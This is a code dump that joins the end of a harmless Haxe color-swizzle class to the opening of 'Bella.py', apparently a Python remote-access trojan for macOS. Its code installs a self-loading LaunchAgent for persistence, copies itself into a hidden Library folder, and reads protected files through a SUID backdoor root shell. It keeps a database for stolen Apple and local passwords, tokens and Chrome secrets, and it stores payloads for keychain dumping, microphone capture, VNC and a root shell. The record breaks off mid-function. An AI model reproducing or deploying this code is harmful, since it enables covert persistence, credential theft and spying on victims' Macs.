@:dox(hide) public var rbba (get, never):Color; private function get_rbba() return Color.get(red, blue, blue, alpha);
@:dox(hide) public var rbar (get, never):Color; private function get_rbar() return Color.get(red, blue, alpha, red);
@:dox(hide) public var rbag (get, never):Color; private function get_rbag() return Color.get(red, blue, alpha, green);
@:dox(hide) public var rbab (get, never):Color; private function get_rbab() return Color.get(red, blue, alpha,blue);
@:dox(hide) public var rbaa (get, never):Color; private function get_rbaa() return Color.get(red, blue, alpha, alpha);
@:dox(hide) public var rarr (get, never):Color; private function get_rarr() return Color.get(red, alpha, red, red);
@:dox(hide) public var rarg (get, never):Color; private function get_rarg() return Color.get(red, alpha, red, green);
@:dox(hide) public var rarb (get, never):Color; private function get_rarb() return Color.get(red, alpha, red,blue);
@:dox(hide) public var rara (get, never):Color; private function get_rara() return Color.get(red, alpha, red, alpha);
@:dox(hide) public var ragr (get, never):Color; private function get_ragr() return Color.get(red, alpha, green, red);
@:dox(hide) public var ragg (get, never):Color; private function get_ragg() return Color.get(red, alpha, green, green);
@:dox(hide) public var ragb (get, never):Color; private function get_ragb() return Color.get(red, alpha, green,blue);
@:dox(hide) public var raga (get, never):Color; private function get_raga() return Color.get(red, alpha, green, alpha);
@:dox(hide) public var rabr (get, never):Color; private function get_rabr() return Color.get(red, alpha, blue, red);
@:dox(hide) public var rabg (get, never):Color; private function get_rabg() return Color.get(red, alpha, blue, green);
@:dox(hide) public var rabb (get, never):Color; private function get_rabb() return Color.get(red, alpha, blue,blue);
@:dox(hide) public var raba (get, never):Color; private function get_raba() return Color.get(red, alpha, blue, alpha);
@:dox(hide) public var raar (get, never):Color; private function get_raar() return Color.get(red, alpha, alpha, red);
@:dox(hide) public var raag (get, never):Color; private function get_raag() return Color.get(red, alpha, alpha, green);
@:dox(hide) public var raab (get, never):Color; private function get_raab() return Color.get(red, alpha, alpha,blue);
@:dox(hide) public var raaa (get, never):Color; private function get_raaa() return Color.get(red, alpha, alpha, alpha);
@:dox(hide) public var grrr (get, never):Color; private function get_grrr() return Color.get(green, red, red, red);
@:dox(hide) public var grrg (get, never):Color; private function get_grrg() return Color.get(green, red, red, green);
@:dox(hide) public var grrb (get, never):Color; private function get_grrb() return Color.get(green, red, red,blue);
@:dox(hide) public var grra (get, never):Color; private function get_grra() return Color.get(green, red, red, alpha);
@:dox(hide) public var grgr (get, never):Color; private function get_grgr() return Color.get(green, red, green, red);
@:dox(hide) public var grgg (get, never):Color; private function get_grgg() return Color.get(green, red, green, green);
@:dox(hide) public var grgb (get, never):Color; private function get_grgb() return Color.get(green, red, green,blue);
@:dox(hide) public var grga (get, never):Color; private function get_grga() return Color.get(green, red, green, alpha);
@:dox(hide) public var grbr (get, never):Color; private function get_grbr() return Color.get(green, red, blue, red);
@:dox(hide) public var grbg (get, never):Color; private function get_grbg() return Color.get(green, red, blue, green);
@:dox(hide) public var grbb (get, never):Color; private function get_grbb() return Color.get(green, red, blue,blue);
@:dox(hide) public var grba (get, never):Color; private function get_grba() return Color.get(green, red, blue, alpha);
@:dox(hide) public var grar (get, never):Color; private function get_grar() return Color.get(green, red, alpha, red);
@:dox(hide) public var grag (get, never):Color; private function get_grag() return Color.get(green, red, alpha, green);
@:dox(hide) public var grab (get, never):Color; private function get_grab() return Color.get(green, red, alpha,blue);
@:dox(hide) public var graa (get, never):Color; private function get_graa() return Color.get(green, red, alpha, alpha);
@:dox(hide) public var ggrr (get, never):Color; private function get_ggrr() return Color.get(green, green, red, red);
@:dox(hide) public var ggrg (get, never):Color; private function get_ggrg() return Color.get(green, green, red, green);
@:dox(hide) public var ggrb (get, never):Color; private function get_ggrb() return Color.get(green, green, red,blue);
@:dox(hide) public var ggra (get, never):Color; private function get_ggra() return Color.get(green, green, red, alpha);
@:dox(hide) public var gggr (get, never):Color; private function get_gggr() return Color.get(green, green, green, red);
@:dox(hide) public var gggg (get, never):Color; private function get_gggg() return Color.get(green, green, green, green);
@:dox(hide) public var gggb (get, never):Color; private function get_gggb() return Color.get(green, green, green,blue);
@:dox(hide) public var ggga (get, never):Color; private function get_ggga() return Color.get(green, green, green, alpha);
@:dox(hide) public var ggbr (get, never):Color; private function get_ggbr() return Color.get(green, green, blue, red);
@:dox(hide) public var ggbg (get, never):Color; private function get_ggbg() return Color.get(green, green, blue, green);
@:dox(hide) public var ggbb (get, never):Color; private function get_ggbb() return Color.get(green, green, blue,blue);
@:dox(hide) public var ggba (get, never):Color; private function get_ggba() return Color.get(green, green, blue, alpha);
@:dox(hide) public var ggar (get, never):Color; private function get_ggar() return Color.get(green, green, alpha, red);
@:dox(hide) public var ggag (get, never):Color; private function get_ggag() return Color.get(green, green, alpha, green);
@:dox(hide) public var ggab (get, never):Color; private function get_ggab() return Color.get(green, green, alpha,blue);
@:dox(hide) public var ggaa (get, never):Color; private function get_ggaa() return Color.get(green, green, alpha, alpha);
@:dox(hide) public var gbrr (get, never):Color; private function get_gbrr() return Color.get(green, blue, red, red);
@:dox(hide) public var gbrg (get, never):Color; private function get_gbrg() return Color.get(green, blue, red, green);
@:dox(hide) public var gbrb (get, never):Color; private function get_gbrb() return Color.get(green, blue, red,blue);
@:dox(hide) public var gbra (get, never):Color; private function get_gbra() return Color.get(green, blue, red, alpha);
@:dox(hide) public var gbgr (get, never):Color; private function get_gbgr() return Color.get(green, blue, green, red);
@:dox(hide) public var gbgg (get, never):Color; private function get_gbgg() return Color.get(green, blue, green, green);
@:dox(hide) public var gbgb (get, never):Color; private function get_gbgb() return Color.get(green, blue, green,blue);
@:dox(hide) public var gbga (get, never):Color; private function get_gbga() return Color.get(green, blue, green, alpha);
@:dox(hide) public var gbbr (get, never):Color; private function get_gbbr() return Color.get(green, blue, blue, red);
@:dox(hide) public var gbbg (get, never):Color; private function get_gbbg() return Color.get(green, blue, blue, green);
@:dox(hide) public var gbbb (get, never):Color; private function get_gbbb() return Color.get(green, blue, blue,blue);
@:dox(hide) public var gbba (get, never):Color; private function get_gbba() return Color.get(green, blue, blue, alpha);
@:dox(hide) public var gbar (get, never):Color; private function get_gbar() return Color.get(green, blue, alpha, red);
@:dox(hide) public var gbag (get, never):Color; private function get_gbag() return Color.get(green, blue, alpha, green);
@:dox(hide) public var gbab (get, never):Color; private function get_gbab() return Color.get(green, blue, alpha,blue);
@:dox(hide) public var gbaa (get, never):Color; private function get_gbaa() return Color.get(green, blue, alpha, alpha);
@:dox(hide) public var garr (get, never):Color; private function get_garr() return Color.get(green, alpha, red, red);
@:dox(hide) public var garg (get, never):Color; private function get_garg() return Color.get(green, alpha, red, green);
@:dox(hide) public var garb (get, never):Color; private function get_garb() return Color.get(green, alpha, red,blue);
@:dox(hide) public var gara (get, never):Color; private function get_gara() return Color.get(green, alpha, red, alpha);
@:dox(hide) public var gagr (get, never):Color; private function get_gagr() return Color.get(green, alpha, green, red);
@:dox(hide) public var gagg (get, never):Color; private function get_gagg() return Color.get(green, alpha, green, green);
@:dox(hide) public var gagb (get, never):Color; private function get_gagb() return Color.get(green, alpha, green,blue);
@:dox(hide) public var gaga (get, never):Color; private function get_gaga() return Color.get(green, alpha, green, alpha);
@:dox(hide) public var gabr (get, never):Color; private function get_gabr() return Color.get(green, alpha, blue, red);
@:dox(hide) public var gabg (get, never):Color; private function get_gabg() return Color.get(green, alpha, blue, green);
@:dox(hide) public var gabb (get, never):Color; private function get_gabb() return Color.get(green, alpha, blue,blue);
@:dox(hide) public var gaba (get, never):Color; private function get_gaba() return Color.get(green, alpha, blue, alpha);
@:dox(hide) public var gaar (get, never):Color; private function get_gaar() return Color.get(green, alpha, alpha, red);
@:dox(hide) public var gaag (get, never):Color; private function get_gaag() return Color.get(green, alpha, alpha, green);
@:dox(hide) public var gaab (get, never):Color; private function get_gaab() return Color.get(green, alpha, alpha,blue);
@:dox(hide) public var gaaa (get, never):Color; private function get_gaaa() return Color.get(green, alpha, alpha, alpha);
@:dox(hide) public var brrr (get, never):Color; private function get_brrr() return Color.get(blue, red, red, red);
@:dox(hide) public var brrg (get, never):Color; private function get_brrg() return Color.get(blue, red, red, green);
@:dox(hide) public var brrb (get, never):Color; private function get_brrb() return Color.get(blue, red, red,blue);
@:dox(hide) public var brra (get, never):Color; private function get_brra() return Color.get(blue, red, red, alpha);
@:dox(hide) public var brgr (get, never):Color; private function get_brgr() return Color.get(blue, red, green, red);
@:dox(hide) public var brgg (get, never):Color; private function get_brgg() return Color.get(blue, red, green, green);
@:dox(hide) public var brgb (get, never):Color; private function get_brgb() return Color.get(blue, red, green,blue);
@:dox(hide) public var brga (get, never):Color; private function get_brga() return Color.get(blue, red, green, alpha);
@:dox(hide) public var brbr (get, never):Color; private function get_brbr() return Color.get(blue, red, blue, red);
@:dox(hide) public var brbg (get, never):Color; private function get_brbg() return Color.get(blue, red, blue, green);
@:dox(hide) public var brbb (get, never):Color; private function get_brbb() return Color.get(blue, red, blue,blue);
@:dox(hide) public var brba (get, never):Color; private function get_brba() return Color.get(blue, red, blue, alpha);
@:dox(hide) public var brar (get, never):Color; private function get_brar() return Color.get(blue, red, alpha, red);
@:dox(hide) public var brag (get, never):Color; private function get_brag() return Color.get(blue, red, alpha, green);
@:dox(hide) public var brab (get, never):Color; private function get_brab() return Color.get(blue, red, alpha,blue);
@:dox(hide) public var braa (get, never):Color; private function get_braa() return Color.get(blue, red, alpha, alpha);
@:dox(hide) public var bgrr (get, never):Color; private function get_bgrr() return Color.get(blue, green, red, red);
@:dox(hide) public var bgrg (get, never):Color; private function get_bgrg() return Color.get(blue, green, red, green);
@:dox(hide) public var bgrb (get, never):Color; private function get_bgrb() return Color.get(blue, green, red,blue);
@:dox(hide) public var bgra (get, never):Color; private function get_bgra() return Color.get(blue, green, red, alpha);
@:dox(hide) public var bggr (get, never):Color; private function get_bggr() return Color.get(blue, green, green, red);
@:dox(hide) public var bggg (get, never):Color; private function get_bggg() return Color.get(blue, green, green, green);
@:dox(hide) public var bggb (get, never):Color; private function get_bggb() return Color.get(blue, green, green,blue);
@:dox(hide) public var bgga (get, never):Color; private function get_bgga() return Color.get(blue, green, green, alpha);
@:dox(hide) public var bgbr (get, never):Color; private function get_bgbr() return Color.get(blue, green, blue, red);
@:dox(hide) public var bgbg (get, never):Color; private function get_bgbg() return Color.get(blue, green, blue, green);
@:dox(hide) public var bgbb (get, never):Color; private function get_bgbb() return Color.get(blue, green, blue,blue);
@:dox(hide) public var bgba (get, never):Color; private function get_bgba() return Color.get(blue, green, blue, alpha);
@:dox(hide) public var bgar (get, never):Color; private function get_bgar() return Color.get(blue, green, alpha, red);
@:dox(hide) public var bgag (get, never):Color; private function get_bgag() return Color.get(blue, green, alpha, green);
@:dox(hide) public var bgab (get, never):Color; private function get_bgab() return Color.get(blue, green, alpha,blue);
@:dox(hide) public var bgaa (get, never):Color; private function get_bgaa() return Color.get(blue, green, alpha, alpha);
@:dox(hide) public var bbrr (get, never):Color; private function get_bbrr() return Color.get(blue, blue, red, red);
@:dox(hide) public var bbrg (get, never):Color; private function get_bbrg() return Color.get(blue, blue, red, green);
@:dox(hide) public var bbrb (get, never):Color; private function get_bbrb() return Color.get(blue, blue, red,blue);
@:dox(hide) public var bbra (get, never):Color; private function get_bbra() return Color.get(blue, blue, red, alpha);
@:dox(hide) public var bbgr (get, never):Color; private function get_bbgr() return Color.get(blue, blue, green, red);
@:dox(hide) public var bbgg (get, never):Color; private function get_bbgg() return Color.get(blue, blue, green, green);
@:dox(hide) public var bbgb (get, never):Color; private function get_bbgb() return Color.get(blue, blue, green,blue);
@:dox(hide) public var bbga (get, never):Color; private function get_bbga() return Color.get(blue, blue, green, alpha);
@:dox(hide) public var bbbr (get, never):Color; private function get_bbbr() return Color.get(blue, blue, blue, red);
@:dox(hide) public var bbbg (get, never):Color; private function get_bbbg() return Color.get(blue, blue, blue, green);
@:dox(hide) public var bbbb (get, never):Color; private function get_bbbb() return Color.get(blue, blue, blue,blue);
@:dox(hide) public var bbba (get, never):Color; private function get_bbba() return Color.get(blue, blue, blue, alpha);
@:dox(hide) public var bbar (get, never):Color; private function get_bbar() return Color.get(blue, blue, alpha, red);
@:dox(hide) public var bbag (get, never):Color; private function get_bbag() return Color.get(blue, blue, alpha, green);
@:dox(hide) public var bbab (get, never):Color; private function get_bbab() return Color.get(blue, blue, alpha,blue);
@:dox(hide) public var bbaa (get, never):Color; private function get_bbaa() return Color.get(blue, blue, alpha, alpha);
@:dox(hide) public var barr (get, never):Color; private function get_barr() return Color.get(blue, alpha, red, red);
@:dox(hide) public var barg (get, never):Color; private function get_barg() return Color.get(blue, alpha, red, green);
@:dox(hide) public var barb (get, never):Color; private function get_barb() return Color.get(blue, alpha, red,blue);
@:dox(hide) public var bara (get, never):Color; private function get_bara() return Color.get(blue, alpha, red, alpha);
@:dox(hide) public var bagr (get, never):Color; private function get_bagr() return Color.get(blue, alpha, green, red);
@:dox(hide) public var bagg (get, never):Color; private function get_bagg() return Color.get(blue, alpha, green, green);
@:dox(hide) public var bagb (get, never):Color; private function get_bagb() return Color.get(blue, alpha, green,blue);
@:dox(hide) public var baga (get, never):Color; private function get_baga() return Color.get(blue, alpha, green, alpha);
@:dox(hide) public var babr (get, never):Color; private function get_babr() return Color.get(blue, alpha, blue, red);
@:dox(hide) public var babg (get, never):Color; private function get_babg() return Color.get(blue, alpha, blue, green);
@:dox(hide) public var babb (get, never):Color; private function get_babb() return Color.get(blue, alpha, blue,blue);
@:dox(hide) public var baba (get, never):Color; private function get_baba() return Color.get(blue, alpha, blue, alpha);
@:dox(hide) public var baar (get, never):Color; private function get_baar() return Color.get(blue, alpha, alpha, red);
@:dox(hide) public var baag (get, never):Color; private function get_baag() return Color.get(blue, alpha, alpha, green);
@:dox(hide) public var baab (get, never):Color; private function get_baab() return Color.get(blue, alpha, alpha,blue);
@:dox(hide) public var baaa (get, never):Color; private function get_baaa() return Color.get(blue, alpha, alpha, alpha);
@:dox(hide) public var arrr (get, never):Color; private function get_arrr() return Color.get(alpha, red, red, red);
@:dox(hide) public var arrg (get, never):Color; private function get_arrg() return Color.get(alpha, red, red, green);
@:dox(hide) public var arrb (get, never):Color; private function get_arrb() return Color.get(alpha, red, red,blue);
@:dox(hide) public var arra (get, never):Color; private function get_arra() return Color.get(alpha, red, red, alpha);
@:dox(hide) public var argr (get, never):Color; private function get_argr() return Color.get(alpha, red, green, red);
@:dox(hide) public var argg (get, never):Color; private function get_argg() return Color.get(alpha, red, green, green);
@:dox(hide) public var argb (get, never):Color; private function get_argb() return Color.get(alpha, red, green,blue);
@:dox(hide) public var arga (get, never):Color; private function get_arga() return Color.get(alpha, red, green, alpha);
@:dox(hide) public var arbr (get, never):Color; private function get_arbr() return Color.get(alpha, red, blue, red);
@:dox(hide) public var arbg (get, never):Color; private function get_arbg() return Color.get(alpha, red, blue, green);
@:dox(hide) public var arbb (get, never):Color; private function get_arbb() return Color.get(alpha, red, blue,blue);
@:dox(hide) public var arba (get, never):Color; private function get_arba() return Color.get(alpha, red, blue, alpha);
@:dox(hide) public var arar (get, never):Color; private function get_arar() return Color.get(alpha, red, alpha, red);
@:dox(hide) public var arag (get, never):Color; private function get_arag() return Color.get(alpha, red, alpha, green);
@:dox(hide) public var arab (get, never):Color; private function get_arab() return Color.get(alpha, red, alpha,blue);
@:dox(hide) public var araa (get, never):Color; private function get_araa() return Color.get(alpha, red, alpha, alpha);
@:dox(hide) public var agrr (get, never):Color; private function get_agrr() return Color.get(alpha, green, red, red);
@:dox(hide) public var agrg (get, never):Color; private function get_agrg() return Color.get(alpha, green, red, green);
@:dox(hide) public var agrb (get, never):Color; private function get_agrb() return Color.get(alpha, green, red,blue);
@:dox(hide) public var agra (get, never):Color; private function get_agra() return Color.get(alpha, green, red, alpha);
@:dox(hide) public var aggr (get, never):Color; private function get_aggr() return Color.get(alpha, green, green, red);
@:dox(hide) public var aggg (get, never):Color; private function get_aggg() return Color.get(alpha, green, green, green);
@:dox(hide) public var aggb (get, never):Color; private function get_aggb() return Color.get(alpha, green, green,blue);
@:dox(hide) public var agga (get, never):Color; private function get_agga() return Color.get(alpha, green, green, alpha);
@:dox(hide) public var agbr (get, never):Color; private function get_agbr() return Color.get(alpha, green, blue, red);
@:dox(hide) public var agbg (get, never):Color; private function get_agbg() return Color.get(alpha, green, blue, green);
@:dox(hide) public var agbb (get, never):Color; private function get_agbb() return Color.get(alpha, green, blue,blue);
@:dox(hide) public var agba (get, never):Color; private function get_agba() return Color.get(alpha, green, blue, alpha);
@:dox(hide) public var agar (get, never):Color; private function get_agar() return Color.get(alpha, green, alpha, red);
@:dox(hide) public var agag (get, never):Color; private function get_agag() return Color.get(alpha, green, alpha, green);
@:dox(hide) public var agab (get, never):Color; private function get_agab() return Color.get(alpha, green, alpha,blue);
@:dox(hide) public var agaa (get, never):Color; private function get_agaa() return Color.get(alpha, green, alpha, alpha);
@:dox(hide) public var abrr (get, never):Color; private function get_abrr() return Color.get(alpha, blue, red, red);
@:dox(hide) public var abrg (get, never):Color; private function get_abrg() return Color.get(alpha, blue, red, green);
@:dox(hide) public var abrb (get, never):Color; private function get_abrb() return Color.get(alpha, blue, red,blue);
@:dox(hide) public var abra (get, never):Color; private function get_abra() return Color.get(alpha, blue, red, alpha);
@:dox(hide) public var abgr (get, never):Color; private function get_abgr() return Color.get(alpha, blue, green, red);
@:dox(hide) public var abgg (get, never):Color; private function get_abgg() return Color.get(alpha, blue, green, green);
@:dox(hide) public var abgb (get, never):Color; private function get_abgb() return Color.get(alpha, blue, green,blue);
@:dox(hide) public var abga (get, never):Color; private function get_abga() return Color.get(alpha, blue, green, alpha);
@:dox(hide) public var abbr (get, never):Color; private function get_abbr() return Color.get(alpha, blue, blue, red);
@:dox(hide) public var abbg (get, never):Color; private function get_abbg() return Color.get(alpha, blue, blue, green);
@:dox(hide) public var abbb (get, never):Color; private function get_abbb() return Color.get(alpha, blue, blue,blue);
@:dox(hide) public var abba (get, never):Color; private function get_abba() return Color.get(alpha, blue, blue, alpha);
@:dox(hide) public var abar (get, never):Color; private function get_abar() return Color.get(alpha, blue, alpha, red);
@:dox(hide) public var abag (get, never):Color; private function get_abag() return Color.get(alpha, blue, alpha, green);
@:dox(hide) public var abab (get, never):Color; private function get_abab() return Color.get(alpha, blue, alpha,blue);
@:dox(hide) public var abaa (get, never):Color; private function get_abaa() return Color.get(alpha, blue, alpha, alpha);
@:dox(hide) public var aarr (get, never):Color; private function get_aarr() return Color.get(alpha, alpha, red, red);
@:dox(hide) public var aarg (get, never):Color; private function get_aarg() return Color.get(alpha, alpha, red, green);
@:dox(hide) public var aarb (get, never):Color; private function get_aarb() return Color.get(alpha, alpha, red,blue);
@:dox(hide) public var aara (get, never):Color; private function get_aara() return Color.get(alpha, alpha, red, alpha);
@:dox(hide) public var aagr (get, never):Color; private function get_aagr() return Color.get(alpha, alpha, green, red);
@:dox(hide) public var aagg (get, never):Color; private function get_aagg() return Color.get(alpha, alpha, green, green);
@:dox(hide) public var aagb (get, never):Color; private function get_aagb() return Color.get(alpha, alpha, green,blue);
@:dox(hide) public var aaga (get, never):Color; private function get_aaga() return Color.get(alpha, alpha, green, alpha);
@:dox(hide) public var aabr (get, never):Color; private function get_aabr() return Color.get(alpha, alpha, blue, red);
@:dox(hide) public var aabg (get, never):Color; private function get_aabg() return Color.get(alpha, alpha, blue, green);
@:dox(hide) public var aabb (get, never):Color; private function get_aabb() return Color.get(alpha, alpha, blue,blue);
@:dox(hide) public var aaba (get, never):Color; private function get_aaba() return Color.get(alpha, alpha, blue, alpha);
@:dox(hide) public var aaar (get, never):Color; private function get_aaar() return Color.get(alpha, alpha, alpha, red);
@:dox(hide) public var aaag (get, never):Color; private function get_aaag() return Color.get(alpha, alpha, alpha, green);
@:dox(hide) public var aaab (get, never):Color; private function get_aaab() return Color.get(alpha, alpha, alpha,blue);
@:dox(hide) public var aaaa (get, never):Color; private function get_aaaa() return Color.get(alpha, alpha, alpha, alpha);
} | 42,299 | Color | hx | en | haxe | code | {"qsc_code_num_words": 6883, "qsc_code_num_chars": 42299.0, "qsc_code_mean_word_length": 4.30306552, "qsc_code_frac_words_unique": 0.06755775, "qsc_code_frac_chars_top_2grams": 0.07066649, "qsc_code_frac_chars_top_3grams": 0.13123776, "qsc_code_frac_chars_top_4grams": 0.15288001, "qsc_code_frac_chars_dupe_5grams": 0.82669323, "qsc_code_frac_chars_dupe_6grams": 0.80663786, "qsc_code_frac_chars_dupe_7grams": 0.33142008, "qsc_code_frac_chars_dupe_8grams": 0.0520967, "qsc_code_frac_chars_dupe_9grams": 0.05020596, "qsc_code_frac_chars_dupe_10grams": 0.03973935, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01569366, "qsc_code_frac_chars_whitespace": 0.13380931, "qsc_code_size_file_byte": 42299.0, "qsc_code_num_lines": 487.0, "qsc_code_num_chars_line_max": 220.0, "qsc_code_num_chars_line_mean": 86.85626283, "qsc_code_frac_chars_alphabet": 0.79267993, "qsc_code_frac_chars_comments": 0.015485, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.02242152, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.00224215, "qsc_code_frac_chars_string_length": 0.00151279, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00105655, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 1, "qsc_code_frac_chars_dupe_6grams": 1, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
00xglitch/Bella | Bella.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, socket, subprocess, time, os, platform, struct, getpass, datetime, plistlib, re, stat, grp, shutil
import string, json, traceback, pwd, urllib, urllib2, base64, binascii, hashlib, sqlite3, bz2, pickle, ast
import StringIO, zipfile, hmac, tempfile, ssl
from xml.etree import ElementTree as ET
from subprocess import Popen, PIPE
from glob import glob
development = True
def create_bella_helpers(launch_agent_name, bella_folder, home_path):
launch_agent_create = """<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
<plist version=\"1.0\">
<dict>
<key>Label</key>
<string>%s</string>
<key>ProgramArguments</key>
<array>
<string>%s/Library/%s/Bella</string>
</array>
<key>StartInterval</key>
<integer>5</integer>
</dict>
</plist>\n""" % (launch_agent_name, home_path, bella_folder)
if not os.path.isdir('%s/Library/LaunchAgents/' % home_path):
os.makedirs('%s/Library/LaunchAgents/' % home_path)
with open('%s/Library/LaunchAgents/%s.plist' % (home_path, launch_agent_name), 'wb') as content:
content.write(launch_agent_create)
print 'Created Launch Agent'
print 'Moving Bella'
if not os.path.isdir('%s/Library/%s/' % (home_path, bella_folder)):
os.makedirs('%s/Library/%s/' % (home_path, bella_folder))
if development:
with open(__file__, 'rb') as content:
with open('%s/Library/%s/Bella' % (home_path, bella_folder), 'wb') as binary:
binary.write(content.read())
else:
os.rename(__file__, '%s/Library/%s/Bella' % (home_path, bella_folder))
os.chmod('%s/Library/%s/Bella' % (home_path, bella_folder), 0777)
print 'Loading Launch Agent'
out = subprocess.Popen('launchctl load -w %s/Library/LaunchAgents/%s.plist' % (home_path, launch_agent_name), shell=True, stderr=subprocess.PIPE).stderr.read()
if out == '':
time.sleep(1)
ctl_list = subprocess.Popen('launchctl list'.split(), stdout=subprocess.PIPE)
ctl = ctl_list.stdout.read()
completed = False
for agent in ctl.splitlines():
if launch_agent_name in agent:
completed = True
if completed:
print 'Loaded LaunchAgent'
print 'BELLA IS NOW RUNNING. CONNECT TO BELLA FROM THE CONTROL CENTER.'
exit()
else:
pass
print 'Error loading LaunchAgent.'
elif 'service already loaded' in out:
print 'Bella is already loaded in LaunchCTL.'
exit()
else:
print out
pass
return
def globber(path): #if we are root, this globber will give us all paths
if os.getuid() != 0:
if is_there_SUID_shell():
(status, msg) = do_root(r"python -c \"from glob import glob; print glob('%s')\"" % path) #special escapes
if status:
return ast.literal_eval(msg) #convert string list to list
return glob(path)
def protected_file_lister(path):
if os.getuid() != 0:
if is_there_SUID_shell():
(status, msg) = do_root(r"python -c \"import os; print os.listdir('%s')\"" % path) #special escapes
if status:
return ast.literal_eval(msg)
return os.listdir(path)
def protected_file_reader(path): #for reading files when we have a backdoor root shell
if os.getuid() != 0:
if is_there_SUID_shell():
(status, msg) = do_root(r"python -c \"g = open('%s'); print g.read(); g.close()\"" % path) #special escapes
if status:
return msg[:-2] #this will be a raw representation of the file. knock off last 2 carriage returns
if os.access(path, os.R_OK):
with open(path, 'r') as content:
return content.read()
return '[%s] is not accessible' % path
def subprocess_manager(pid, path, name): #will keep track of a PID and its path in the global payload_list
global payload_list
payload_list.append((pid, path, name)) #path is the binary that we will shutil.rmtree for, and PID we will kill
return True
def subprocess_cleanup(): #will clean up all of those in the global payload_list
global payload_list
for x in payload_list:
p = kill_pid(x[0])
#print 'Killed pid [%s]: %s' % (x[0], repr(p))
payload_cleaner()
#print 'removed payload [%s]: %s' % (x[1], repr(p))
if p:
print 'Killed and cleaned [%s]' % x[2]
payload_list.remove(x)
def readDB(column, payload=False):
#we need the path specified below, because we cant read the helper location from DB without knowing what to read
conn = sqlite3.connect('%sbella.db' % get_bella_path()) #will create if doesnt exist
c = conn.cursor()
if payload:
c.execute("SELECT %s FROM payloads WHERE id = 1" % column)
else:
c.execute("SELECT %s FROM bella WHERE id = %s" % (column, bella_UID))
try:
value = c.fetchone()[0]
if value == None:
return False
except TypeError as e:
return False
return base64.b64decode(value) #DECODES the data that updatedb ENCODES!
def updateDB(data, column):
data = base64.b64encode(data) #readDB will return this data DECODED
if not os.path.isfile("%sbella.db" % get_bella_path()):
creator = createDB()
if not creator[0]:
return (False, "Error creating database! [%s]" % creator[1])
conn = sqlite3.connect('%sbella.db' % get_bella_path()) #will create if doesnt exist
c = conn.cursor()
c.execute("SELECT * FROM bella WHERE id = %s" % bella_UID)
if len(c.fetchall()) == 0: #then that user is not yet in our DB, so let's create them
c.execute("INSERT INTO bella (id, username) VALUES (%s, '%s')" % (bella_UID, get_bella_user()))
c.execute("UPDATE bella set %s = '%s' WHERE id = %s" % (column, data, bella_UID))
conn.commit()
conn.close()
return (True, '')
def check_if_payloads():
conn = sqlite3.connect('%sbella.db' % get_bella_path()) #will create if doesnt exist
c = conn.cursor()
c.execute("SELECT * FROM payloads WHERE id = 1")
if len(c.fetchall()) == 0: #then that user is not yet in our DB, so let's create them
return False
return True
def inject_payloads(payload_encoded):
conn = sqlite3.connect('%sbella.db' % get_bella_path()) #will create if doesnt exist
c = conn.cursor()
try:
(vncFile, kcFile, mcFile, rsFile, insomniaFile, lockFile, chainbreakerFile) = payload_encoded.splitlines()
c.execute("INSERT INTO payloads (id, vnc, keychaindump, microphone, root_shell, insomnia, lock_icon, chainbreaker) VALUES (1, '%s', '%s', '%s', '%s', '%s', '%s', '%s')" % (vncFile.encode('base64'), kcFile.encode('base64'), mcFile.encode('base64'), rsFile.encode('base64'), insomniaFile.encode('base64'), lockFile.encode('base64'), chainbreakerFile.encode('base64')))
conn.commit()
conn.close()
return True
except Exception as e:
print e
conn.close()
return False
def createDB():
try:
conn = sqlite3.connect('%sbella.db' % get_bella_path()) #will create if doesnt exist
c = conn.cursor()
c.execute("CREATE TABLE bella (id int, username text, lastLogin text, model text, mme_token text, applePass text, localPass text, chromeSS text, text)")
c.execute("CREATE TABLE payloads(id int, vnc text, keychaindump text, microphone text, root_shell text, insomnia text, lock_icon text, chainbreaker text)")
conn.commit()
conn.close()
print "Created Bella DB"
except sqlite3.OperationalError as e:
if e[0] == "table bella already exists":
return (True, e)
else:
return (False, e) #some error
return (True, None)
def encrypt(data):
#This function will encode any given data into base64. It will then pass this encoded data as
#a command line argument, into the openssl binary, where it will be encrypted with aes-128-cbc
#using the master key specified at the top of the program. We encode the data so there are no unicode issues
#the openssl binary will then return ANOTHER DIFFERENT base64 string, that is the ENCODED ENCRYPTED data
#this ENCODED ENCRYPTED DATA [of ENCODED RAW DATA] can be decrypted by the decrypt function, which expects a
#base64 input and outputs the original raw data in an encoded format. this encoded format is then decoded and returned to
#the subroutine that called the function.
data = base64.b64encode(data)
encrypted = subprocess.check_output("openssl enc -base64 -e -aes-128-cbc -k %s <<< '%s'" % (cryptKey, data), shell=True) #encrypt password
return encrypted
def decrypt(data):
#data = base64.b64decode(data)
